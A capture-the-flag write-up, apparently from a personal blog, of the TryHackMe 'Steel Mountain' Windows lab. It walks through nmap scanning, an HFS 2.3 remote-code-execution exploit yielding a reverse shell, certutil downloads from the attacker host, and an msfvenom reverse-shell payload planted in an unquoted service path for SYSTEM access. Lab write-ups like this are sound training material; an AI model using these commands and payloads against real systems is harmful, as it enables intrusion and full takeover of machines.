Posts Steel Mountain Writeup [THM]
Post
Cancel

Steel Mountain Writeup [THM]

Steel Mountain is a Windows themed machine from tryhackme, based on Mr Robot Tv series , it consists on exploiting HFS 2.3 to obtain initial access and then running winPEAS to discover and exploit an UnquotedServicePath vulnerability

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nmap -sC -sV -Pn 10.10.74.246
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 13:27 CEST
Nmap scan report for 10.10.74.246
Host is up (0.051s latency).                                                                                               
Not shown: 983 closed ports                                                                                                
PORT      STATE    SERVICE      VERSION
23/tcp    filtered telnet
80/tcp    filtered http
110/tcp   filtered pop3
113/tcp   filtered ident
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
143/tcp   filtered imap
199/tcp   filtered smux
443/tcp   filtered https
445/tcp   filtered microsoft-ds
995/tcp   filtered pop3s
8080/tcp  filtered http-proxy
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We see there are various ports open, first we are going to focus on web-related ports : 80 and 8080 Browsing to port 80 we see the following landing page with nothing relevant

Web

Then in port 8080 we see that the machine is running HttpFileServer 2.3

FileServer

Doing a quick search , we found several exploits but we will be focusing on the RCE one corresponding to the following CVE https://www.exploit-db.com/exploits/39161

1
2
3
4
5
6
7
8
9
searchsploit Http File Server 2.3
----------------------------------------------------------------------------------------- -------------------------
 Exploit Title                                                                           |  Path
----------------------------------------------------------------------------------------- -------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                           | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                      | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                      | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                 | windows/webapps/34852.txt
----------------------------------------------------------------------------------------- -------------------------

Exploitation

In order to obtain a reverse shell running the RCE exploit, we need to host a webserver containing netcat, we can do this with python:

1
python -m SimpleHTTPServer 80

Running the exploit :

1
python 39161.py 10.10.74.246 8080

After running it , we check netcat and obtain a reverse shell as bill :

1
2
3
4
5
6
7
nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.74.246] 49362
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>whoami
steelmountain\bill

Privilege Escalation

For this part we are going to use an enumeration tool called WinPEAS : https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS As we previously hosted a web server in port 80 with python, we can download winPEAS in the victim machine through certutil.exe :

1
2
3
4
5
C:\tmp>certutil.exe -urlcache -split -f http://10.11.14.106:80/winPEAS.exe
****  Online  ****
  000000  ...
  072a00
CertUtil: -URLCache command completed successfully.

Running winPEAS we find the following lines among its output:

1
2
AdvancedSystemCareService9(IObit - Advanced SystemCare Service 9)[C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe] - Auto - Running - No quotes and Space detected                                                                
File Permissions: bill[WriteDataCreateFile]                                                                        

This program can lead to an UnquotedServicePath vulnerability, furthermore we have writing permissions in that directory.

Checking exploitdb we found a CVE related to that service : https://www.exploit-db.com/exploits/40577

In order to exploit this vulnerability we need to upload our shellcode inside C:\Program Files (x86)\IObit\ as Advanced.exe so it will be executed before than Advanced SystemCare.exe

Generating the shellcode:

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.14.106 LPORT=4444 -fexe -o Advanced.exe

Uploading it :

1
certutil.exe -urlcache -split -f http://10.11.14.106:80/Advanced.exe

Finally we only need to restart AdvancedSystemCareService9:

1
2
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9

After restarting it, a reverse shell as nt authority\system is obtained

1
2
3
4
5
6
7
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.232.99] 49210
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
This post is licensed under CC BY 4.0 by the author.